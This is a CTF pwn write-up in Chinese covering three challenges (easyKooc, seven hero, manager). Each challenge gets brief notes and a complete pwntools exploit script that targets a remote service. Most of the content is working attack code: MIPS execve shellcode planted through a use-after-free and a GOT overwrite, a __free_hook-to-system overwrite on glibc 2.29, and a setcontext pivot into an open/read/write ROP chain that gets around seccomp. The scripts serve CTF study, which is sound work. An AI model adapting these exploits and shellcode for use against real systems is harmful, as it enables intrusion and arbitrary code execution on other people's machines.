easyKooc

简单的mips题目,静态地址,存在UAF漏洞,并且有RWX段,可执行shellcode。

利用UAF将shellcode写到可执行段上,然后修改got表跳过去执行即可。

from pwn import *
# The challenge binary is MIPS; set the architecture once so asm()/packing
# helpers default to it.
context.update(arch='mips')
# Local launchers (qemu user-mode with the provided sysroot, or gdb) are kept
# as commented toggles; this run talks to the remote service directly.
#p = process(["qemu-mipsel-static", "-L", "./mipsel-linux-gnu", "./easyKooc"])
#p = gdb.debug("./easyKooc",' b *0x412140')
libc = ELF("./libc-2.23.so")
p = remote("121.36.166.138","8893")
def add(idx, data):
    """Menu option 1: create todo entry *idx* with body *data*.

    Answers the three prompts in the order the service asks them; the id
    is sent as a decimal string and *data* as given, each newline-terminated.
    """
    p.sendlineafter("Plz input your choice", "1")
    p.sendlineafter("Plz input your todo id!", str(idx))
    p.sendlineafter("input your content", data)
def free(idx):
    """Menu option 2: delete todo entry *idx* (id sent as a decimal string)."""
    p.sendlineafter("Plz input your choice", "2")
    p.sendlineafter("Plz input your todo id!", str(idx))

# MIPS shellcode, assembled below and later copied into the RWX region the
# writeup mentions. It stores the little-endian words of "/bin//sh" at
# $sp+28..$sp+35, a zero word at $sp+36 as terminator, points $a0 at the
# string, sets $a1 = $a2 = 0 and $v0 = 4011 (execve in the MIPS o32 ABI),
# then traps.
code = '''
lui $t6,0x6e69
ori $t6,$t6,0x622f
sw $t6,28($sp)

lui $t7,0x6873
ori $t7,$t7,0x2f2f
sw $t7,32($sp)
sw $zero,36($sp)


la $a0,28($sp)

addiu $a1,$zero,0
addiu $a2,$zero,0
addiu $v0,$zero,4011

syscall 0x40404
'''
code = asm(code,arch='mips')
print len(code)  # Python 2 print statement: this script targets py2-era pwntools
# Answer the start-up prompt; the service then prints an address it calls a gift.
p.recvuntil("Plz input your motto!")
p.sendline('111')
p.recvuntil("gift for you: ")
stack = int(p.recvline()[:-1],16)  # hex text, trailing newline dropped
print hex(stack)                    # informational only; not used afterwards
# Two entries, freed 1, 2, 1: the double free the writeup's UAF rests on
# (the libc file name says 2.23, so presumably fastbin rather than tcache).
add(1,'1111')
add(2,'1111')
free(1)
free(2)
free(1)

# The first re-allocation overwrites the freed chunk's link with 0x41213e-8;
# after two more allocations the fourth is handed out at that address and
# receives the shellcode (two padding bytes first).
add(0xf,p32(0x41213e-8))
add(0xe,p32(1))
add(0xd,p32(1))
add(0xc,'\x00'*2+code)


# Same sequence again, aimed at 0x41204a-8: the final write places 0x412140
# (the address the commented-out gdb breakpoint uses, where the shellcode
# now lives) 0xe bytes into that chunk — the GOT slot the writeup says is
# redirected.
free(1)
free(2)
free(1)
add(4,p32(0x41204a-8))
add(5,'1')
add(6,'2')
add(7,'\x00'*0xe+p32(0x412140))
# Menu option 3 calls through the modified GOT entry; then hand over the shell.
p.sendline("3")
p.interactive()

seven hero

2.29的题目,edit大小为0的时候,会将堆块free掉,但是不会清空指针,可以UAF。

先申请到标志位将其赋值得到gift函数的执行权限,得到libc地址。

再一次用UAF漏洞申请到__free_hook处修改其为system函数地址即可getshell。

from pwn import *


#context.log_level = "DEBUG"
# Terminal used when gdb.attach() opens a window.
context.update(terminal=["tmux", "splitw", "-h"])

# Local variant, kept for reference (LD_PRELOAD of the provided libc):
# p = process("/tmp/pwn", env={"LD_PRELOAD":"/tmp/libc.so.6"})
# libc = ELF("/tmp/libc.so.6")
p = remote("119.3.89.93","8015")
libc = ELF("./libc.so.6")
def read_choice(choice):
    """Wait for the menu prompt and send *choice* as a decimal line."""
    p.recvuntil("Input your choice:")
    p.sendline(str(choice))

def add(idx, size, content):
    """Menu option 1: allocate entry *idx* of *size* bytes and send *content* raw."""
    read_choice(1)
    p.recvuntil("please input index: ")
    p.sendline(str(idx))
    p.recvuntil("please input size: ")
    p.sendline(str(size))
    p.recvuntil("Please input content: ")
    p.send(content)

def free(idx):
    """Menu option 3: release entry *idx*.

    The service's success banner is deliberately not consumed here.
    """
    read_choice(3)
    p.recvuntil("index: ")
    p.sendline(str(idx))
    # p.recvuntil("Success")

def edit(idx, size, content=0):
    """Menu option 2: resize entry *idx* to *size*, optionally sending new content.

    With the default content (0) nothing is sent after the size prompt.
    A size of 0 is the path the writeup uses to free a chunk while the
    index still points at it.
    """
    read_choice(2)
    p.recvuntil("index: ")
    p.sendline(str(idx))
    p.recvuntil("Please input size: ")
    p.sendline(str(size))
    if content == 0:
        return
    p.sendafter("content: ", content)


def show(idx):
    """Menu option 4: ask the service to print entry *idx*; the caller reads the output."""
    read_choice(4)
    p.recvuntil("index: ")
    p.sendline(str(idx))
def gift(hack_string):
    """Menu option 666: read the value the service leaks, then send *hack_string* raw.

    Returns the leaked text exactly as received (hex digits, trailing newline
    stripped); callers convert it with int(..., 16).
    """
    read_choice(666)
    p.recvuntil("there is a gift: ")
    leaked = p.recvline()[:-1]
    p.send(hack_string)
    return leaked

def call():
    """Select menu option 5. Defined but never invoked by this script."""
    read_choice(5)
# --- stage 1: heap leak through the UAF ---
# Nine 0x18 entries, then seven frees (8 down to 2). Presumably this fills
# the tcache bin for that size (glibc 2.29 per the writeup) — assumption,
# not visible from this script.
for i in range(0x9):
    add(i,0x18,'a')
for i in range(0x7):
    free(8-i)

# edit with size 0 frees the chunk but leaves the index pointer in place
# (the writeup's UAF), so entry 1 can still be shown afterwards.
edit(0,0)
#add(2,0x18,'\x00'*0x10)
edit(1,0)
show(1)
p.recvuntil("content: ")
# First 6 bytes of the freed chunk, zero-extended to 8; 0x270 is the
# offset from that value to the heap base used below.
heap = u64(p.recv(6)+b'\x00\x00')-0x270
print(hex(heap))
# Write through the dangling pointer so that the second of the next two
# allocations lands at heap+0x250 — the flag slot the writeup says
# unlocks the gift function.
edit(1,0x18,p64(heap+0x250))
add(2,0x18,'a')
add(3,0x18,'a')
# gift prints a libc address; 0x264140 is its offset from the libc base.
libc.address = int(gift('111'),16)-0x264140
print(hex(libc.address))
#gdb.attach(p)
# --- stage 2: same UAF on 0x50 chunks, aimed at __free_hook ---
add(4,0x50,'a')
add(5,0x50,'a')
edit(4,0)
edit(5,0)
edit(5,0x50,p64(libc.sym['__free_hook']))
# The two gift calls presumably consume the two allocations; the second
# one's input lands on __free_hook and writes system's address there
# (the writeup's plan).
gift('111')
gift(p64(libc.sym['system']))
# Freeing a chunk that holds "/bin/sh" now goes through the hook.
add(0,0x28,'/bin/sh\x00')
free(0)
p.interactive()

manager

开启了seccomp保护,禁止exec系统调用。

漏洞点跟上一题一样,edit大小为0的时候,会将堆块free掉,但是不会清空指针,可以UAF。

首先用unsorted bin进行leak libc地址。

接着leak出heap地址。

在堆中构造出假堆头,修改free的堆块fd指向该假堆块,利用其修改name指针地址为__free_hook

接着将__free_hook修改为setcontext,并在堆上写好相应的寄存器值以及rop串即可获取flag。

from pwn import *
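# Local launcher kept as a commented toggle, matching the convention of the
# other scripts on this page. The original assigned process() and then
# immediately rebound p to remote(), spawning a local child for nothing.
#p = process("./pwn")
p = remote("122.112.231.25","8005")
# libc object pwntools resolves for the challenge binary (ELF.libc);
# its base is filled in later from the leak.
libc = ELF("./pwn").libc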
def add(num, name, size, data):
    """Menu option 1: create a staff entry.

    Prompts are answered in service order: the name (sent raw), the staff
    number and the info length (decimal, newline-terminated), then the info
    bytes (sent raw).
    """
    p.sendlineafter(">>>", "1")
    p.sendafter("Input Name of Staff:", name)
    p.sendlineafter("Input Number of Staff:", str(num))
    p.sendlineafter("Input len of Info:", str(size))
    p.sendafter("get Info:", data)

def edit_name(num, name):
    """Menu option 2, sub-choice 1: replace the name of entry *num*.

    The number is sent without a newline (as the service apparently
    expects here); the new name is sent raw.
    """
    p.sendlineafter(">>>", "2")
    p.sendafter("Input Number:", str(num))
    p.sendlineafter("Choice: 1.Edit Name 2.Edit Info\n > ", "1")
    p.sendafter("Input name:", name)
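def edit_info(num, size, data):
    """Menu option 2, sub-choice 2: resize the info of entry *num* to *size*.

    The original accepted *data* but never sent it. The only call in this
    script uses size 0, which per the writeup frees the entry; that path is
    left unchanged and still waits for the "Input info:" prompt. For a
    nonzero size the content is now sent after that prompt, the same way
    edit_info2 does.
    NOTE(review): assumes the service reads no content when size is 0 — confirm.
    """
    p.recvuntil(">>>")
    p.sendline("2")
    p.recvuntil("Input Number:")
    p.send(str(num))
    p.recvuntil("Choice: 1.Edit Name 2.Edit Info\n > ")
    p.sendline(str(2))
    p.recvuntil("Input len of Info:")
    p.sendline(str(size))
    p.recvuntil("Input info:")
    if size:
        p.send(data)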
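def edit_info2(num, size, data):
    """Menu option 2, sub-choice 2: write *size* bytes of *data* as entry *num*'s info.

    Fix: the original sent an undefined name (`info`) and would have raised
    NameError on the last line; the content parameter is *data*.
    """
    p.recvuntil(">>>")
    p.sendline("2")
    p.recvuntil("Input Number:")
    p.send(str(num))
    p.recvuntil("Choice: 1.Edit Name 2.Edit Info\n > ")
    p.sendline(str(2))
    p.recvuntil("Input len of Info:")
    p.sendline(str(size))
    p.recvuntil("Input info:")
    p.send(data)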
def show(num):
    """Menu option 4: have the service print entry *num* (number sent without newline)."""
    p.sendlineafter(">>>", "4")
    p.sendafter("Input staff number:", str(num))
def free(num):
    """Menu option 3: delete entry *num* (number sent as a decimal line)."""
    p.sendlineafter(">>>", "3")
    p.sendlineafter("Input Number of Staff:", str(num))



# Offsets kept from experimentation (presumably one_gadget candidates for
# this libc); nothing below references `one`.
one =[0x45226,0x4527a,0xf0364,0xf1207]
# Answers to the two start-up prompts, taken from the writeup as-is; their
# meaning is not recoverable from this script alone.
p.recvuntil("Input String1:")
p.sendline("\x02\x01\x00")
p.recvuntil("Input String2:")
p.sendline("\x01\x26")


# --- libc leak via the unsorted bin (writeup step 1) ---
# A 0xf8 chunk freed between two 0x68 ones, then re-allocated with an
# 8-byte name. show() prints the name without a terminator, so the bytes
# right after it (a stale bin pointer, presumably) leak.
add(0,'a',0xf8,'aaaa')
add(1,'a',0x68,'aaaa')
add(2,'a',0x68,'aaaa')
free(0)
add(0,'a'*8,0xf8,'a')
show(0)

p.recvuntil("a"*8)
# 6 leaked bytes, zero-extended; 0x3C4C68 is the offset from that pointer
# to the libc base for the provided libc.
libc.address = u64(p.recv(6)+'\x00\x00')-0x3C4C68
print hex(libc.address)  # Python 2 print statement



stack = 0x10000000  # not used below
# ROP gadgets and a syscall stub, all as offsets from the leaked libc base.
pop_rdi = 0x0000000000021112 + libc.address
pop_rsi = 0x00000000000202f8 + libc.address
pop_rdx = 0x0000000000001b92 + libc.address
pop_rax = 0x000000000003a738 + libc.address
pop_rsp = 0x0000000000003838 + libc.address
syscall = 0x0000000000101597 + libc.address
ret = 0x1015B2 + libc.address



# --- heap leak (writeup step 2) ---
add(3,'a',0x58,'aaaa')


add(4,'a',0x68,'aaaa')
add(5,'a',0x68,'aaaa')
add(6,'a',0x68,'aaaa')
# A size-0 edit frees entry 4 without clearing its pointer (the writeup's
# UAF); free(5), free(4) then put chunk 4 on the free list a second time.
edit_info(4,0,'a')
free(5)
free(4)
add(4,'a',0x68,'\x90')
add(5,'a',0x68,'\x00'*0x58+'\x71')
# Entry 4's info now starts with a free-list pointer; 0x590 is its offset
# from the heap base used below.
show(4)
p.recvuntil('Info:')
heap = u64(p.recv(6)+'\x00\x00')-0x590
print hex(heap)


# --- ROP chain: open("./flag") / read(3, buf, 0x100) / write(1, buf, 0x100) ---
# exec is blocked by seccomp (writeup), so the flag is read and written to
# stdout instead. rax = 2 / 0 / 1 are the x86-64 open / read / write
# syscall numbers. The path string is appended at the very end of the chain
# so that it presumably sits at heap+0x918 once the chain is on the heap.
payload = ''
payload += p64(pop_rdi)
payload += p64(heap+0x918)
payload += p64(pop_rsi)
payload += p64(4)
payload += p64(pop_rdx)
payload += p64(4)
payload += p64(pop_rax)
payload += p64(2)
payload += p64(syscall)


# read(3, heap+0xdb8, 0x100): fd 3 assumed to be the file just opened.
payload += p64(pop_rdi)
payload += p64(3)
payload += p64(pop_rsi)
payload += p64(heap+0x500+0x8b8)
payload += p64(pop_rdx)
payload += p64(0x100)
payload += p64(pop_rax)
payload += p64(0)
payload += p64(syscall)


# write(1, heap+0xdb8, 0x100)
payload += p64(pop_rdi)
payload += p64(1)
payload += p64(pop_rsi)
payload += p64(heap+0x500+0x8b8)
payload += p64(pop_rdx)
payload += p64(0x100)
payload += p64(pop_rax)
payload += p64(1)
payload += p64(syscall)
payload += './flag\x00'


# --- writeup steps 3-4: point a name pointer at __free_hook, write
# setcontext into it, then trigger free() with a prepared register frame ---
add(7,'a',0x68,'\x00'*0x68)
#add(1,'a',0x68,'\x00'*0xb+p64(libc.sym['setcontext'])+p64(0))
# Fake chunk header (size field 0x21) followed by a pointer to __free_hook:
# the fake chunk the writeup uses to redirect an entry's name pointer.
add(8,'a',0x68,p64(0)+p64(0x21)+p64(libc.sym['__free_hook']))
# The ROP chain in its own 0xf8-byte entry.
add(9,'a',0xf8,payload)
# Register frame consumed by setcontext: heap+0x840 and the ret gadget at
# the offsets setcontext loads rsp/rip from, heap+0x7b0 further on. The
# layout is taken from the writeup; not verified here.
add(10,'\x00',0xf8,'\x00'*0x60+p64(heap+0x840)+p64(ret)+'\x00'*0x30+p64(heap+0x7b0))
# Entry 6's name pointer presumably now refers to __free_hook, so editing
# the name writes setcontext's address into the hook.
edit_name(6,p64(libc.sym['setcontext']))
#gdb.attach(p,'b *$rebase(0x183B)\n b free')
# free(10): __free_hook -> setcontext on entry 10's contents, which moves
# the stack onto the chain above.
free(10)
p.interactive()